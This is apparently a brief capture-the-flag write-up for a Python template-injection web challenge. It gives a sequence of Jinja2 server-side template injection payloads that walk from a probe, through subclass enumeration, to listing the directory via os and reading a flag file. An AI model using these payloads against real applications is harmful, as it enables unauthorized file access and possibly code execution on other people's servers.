攻防世界-web-高手进阶区011-Web_python_template_injection

1.判断存在python模块注入

{{7+7}}

 

 

 

2.{{''.__class__.__mro__[2].__subclasses__()}}

 

 

 

3.{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

 

 

 

4.{{''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()}}

 

 

 

---